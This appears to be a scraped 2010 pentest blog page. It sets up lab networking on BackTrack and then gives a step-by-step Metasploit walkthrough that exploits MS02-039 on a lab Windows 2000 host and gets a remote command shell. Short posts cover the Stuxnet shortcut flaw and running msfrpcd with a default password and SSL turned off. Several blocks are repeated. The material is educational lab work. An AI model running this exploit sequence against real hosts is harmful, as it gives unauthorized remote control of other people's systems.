192.168.252.0 * 255.255.255.0 U 0 0 0 eth1
root@bt:~# nano /etc/resolv.conf
nameserver 192.168.252.1
nameserver 208.67.222.222
nameserver 208.67.220.220
root@bt:~# ping 192.168.252.1
PING 192.168.252.1 (192.168.252.1) 56(84) bytes of data.
64 bytes from 192.168.252.1: icmp_seq=1 ttl=128 time=0.741 ms
64 bytes from 192.168.252.1: icmp_seq=2 ttl=128 time=0.729 ms
64 bytes from 192.168.252.1: icmp_seq=3 ttl=128 time=0.689 ms
^C
--- 192.168.252.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 0.689/0.719/0.741/0.038 ms
root@bt:~# ping www.yahoo.com
PING any-fp.wa1.b.yahoo.com (72.30.2.43) 56(84) bytes of data.
64 bytes from ir1.fp.vip.sk1.yahoo.com (72.30.2.43): icmp_seq=1 ttl=44 time=308 ms
sniff..
Option 1: Static IP addresses
Note: Ensure that all your Network Interface card (VM) was set to Host-only.
root@bt:~# ifconfig eth0 up
root@bt:~# ifconfig eth0 131.107.1.252/24
root@bt:~# ifconfig eth1 up
root@bt:~# ifconfig eth1 192.168.1.252/24
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:5d:6a:2f
inet addr:131.107.1.252 Bcast:131.107.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe5d:6a2f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:64717 errors:0 dropped:0 overruns:0 frame:0
TX packets:301639 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9873166 (9.8 MB) TX bytes:15566403 (15.5 MB)
Interrupt:19 Base address:0x2000
eth1 Link encap:Ethernet HWaddr 00:0c:29:5d:6a:39
inet addr:192.168.1.252 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe5d:6a39/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:248732 errors:0 dropped:0 overruns:0 frame:0
TX packets:6227 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15234469 (15.2 MB) TX bytes:332024 (332.0 KB)
Interrupt:16 Base address:0x2080
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:29254 errors:0 dropped:0 overruns:0 frame:0
TX packets:29254 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7105201 (7.1 MB) TX bytes:7105201 (7.1 MB)
Option 2: Static & Dynamic IP addresses
Note: Ensure that your 2nd Network Interface card (VM) was set to NAT or Bridge.
root@bt:~# ifconfig eth0 up
root@bt:~# ifconfig eth0 131.107.1.252/24
root@bt:~# ifconfig eth1 up
NAT configuration
root@bt:~# dhclient eth1
sniff...
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth1/00:0c:29:5d:6a:39
Sending on LPF/eth1/00:0c:29:5d:6a:39
Sending on Socket/fallback
DHCPREQUEST of 192.168.252.63 on eth1 to 255.255.255.255 port 67
DHCPNAK from 192.168.162.254
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.162.128 from 192.168.162.254
DHCPREQUEST of 192.168.162.128 on eth1 to 255.255.255.255 port 67
DHCPACK of 192.168.162.128 from 192.168.162.254
bound to 192.168.162.128 -- renewal in 712 seconds.
Bridge configuration with Gateway and Name Servers
root@bt:~# dhclient eth1
sniff..
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth1/00:0c:29:5d:6a:39
Sending on LPF/eth1/00:0c:29:5d:6a:39
Sending on Socket/fallback
DHCPREQUEST of 192.168.162.128 on eth1 to 255.255.255.255 port 67
DHCPNAK from 192.168.252.37
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.252.154 from 192.168.252.37
DHCPREQUEST of 192.168.252.154 on eth1 to 255.255.255.255 port 67
DHCPACK of 192.168.252.154 from 192.168.252.37
bound to 192.168.252.154 -- renewal in 320827 seconds.
root@bt:~# route add default gw 192.168.252.1
root@bt:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default etserver.execut 255.255.255.0 UG 0 0 0 eth1
192.168.101.0 * 255.255.255.0 U 0 0 0 eth0
192.168.252.0 * 255.255.255.0 U 0 0 0 eth1
root@bt:~# nano /etc/resolv.conf
nameserver 192.168.252.1
nameserver 208.67.222.222
nameserver 208.67.220.220
root@bt:~# ping 192.168.252.1
PING 192.168.252.1 (192.168.252.1) 56(84) bytes of data.
64 bytes from 192.168.252.1: icmp_seq=1 ttl=128 time=0.741 ms
64 bytes from 192.168.252.1: icmp_seq=2 ttl=128 time=0.729 ms
64 bytes from 192.168.252.1: icmp_seq=3 ttl=128 time=0.689 ms
^C
--- 192.168.252.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 0.689/0.719/0.741/0.038 ms
root@bt:~# ping www.yahoo.com
PING any-fp.wa1.b.yahoo.com (72.30.2.43) 56(84) bytes of data.
64 bytes from ir1.fp.vip.sk1.yahoo.com (72.30.2.43): icmp_seq=1 ttl=44 time=308 ms
sniff..
Monday, September 13, 2010
Tutorial: Metasploit Basics 1
Exploiting Vulnerable Server (MS02-039)
Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.101/24 (DEN-WEB1)
Step 1: Switch to Metasploit Framework working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole
Step 2: Search for mssql pattern & use the correct exploit module (ms03-039)
msf > search mssql
[*] Searching loaded modules for pattern 'mssql'...
msf > info windows/mssql/ms02_039_slammer
msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show payloads
msf exploit(ms02_039_slammer) > set PAYLOAD windows/shell/bind_tcp
msf exploit(ms02_039_slammer) > show options
msf exploit(ms02_039_slammer) > set RHOST 131.107.1.101
msf exploit(ms02_039_slammer) > set LHOST 131.107.1.252
msf exploit(ms02_039_slammer) > set LPORT 5555
msf exploit(ms02_039_slammer) > exploit
sniff...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.101/24 (DEN-WEB1)
Step 1: Switch to Metasploit Framework working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole
Step 2: Search for mssql pattern & use the correct exploit module (ms03-039)
msf > search mssql
[*] Searching loaded modules for pattern 'mssql'...
msf > info windows/mssql/ms02_039_slammer
msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show payloads
msf exploit(ms02_039_slammer) > set PAYLOAD windows/shell/bind_tcp
msf exploit(ms02_039_slammer) > show options
msf exploit(ms02_039_slammer) > set RHOST 131.107.1.101
msf exploit(ms02_039_slammer) > set LHOST 131.107.1.252
msf exploit(ms02_039_slammer) > set LPORT 5555
msf exploit(ms02_039_slammer) > exploit
sniff...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
Tuesday, August 10, 2010
Windows Shortcut Vulnerability
The Windows Shortcut Exploit, also known as CPLINK, is a zero-day vulnerability in all versions of Windows that allows a Windows shortcut link, known as an .lnk file, to run a malicious DLL file. The dangerous shortcut links can also be embedded on a website or hidden within documents.
The exploit works when you open a device, network share or WebDav point carrying an infection—you don't need to click on anything for the exploit to work, even if you have AutoPlay and AutoRun disabled.
SophosLabs first saw this exploit at work through the rootkit W32/Stuxnet-B, which targets Siemens SCADA systems to discover the system default password.
While Stuxnet only affected Windows machines with infected USB drives plugged in, the Windows Shortcut Exploit in general can work through file shares and WebDav as well.
Download the protection tool here.
Tuesday, July 27, 2010
Metasploit Framework GUI
Just released... Metasploit Framework GUI based on Java.
To launch, follow these steps:
Step 1: Launch msfrpcd
cd /pentest/exploits/framework3
./msfrpcd -S -U root -P toor -p 1337
-S = Disable SSL
-U = Username
-P = Password
-p = Listening port
Step 2: Launch msfgui
cd /pentest/exploits/framework3
./msfgui
When the Metasploit Java based GUI appear, enter the correct Username, Password and Port.
To launch, follow these steps:
Step 1: Launch msfrpcd
cd /pentest/exploits/framework3
./msfrpcd -S -U root -P toor -p 1337
-S = Disable SSL
-U = Username
-P = Password
-p = Listening port
Step 2: Launch msfgui
cd /pentest/exploits/framework3
./msfgui
When the Metasploit Java based GUI appear, enter the correct Username, Password and Port.
Monday, July 26, 2010
Subscribe to:
Posts (Atom)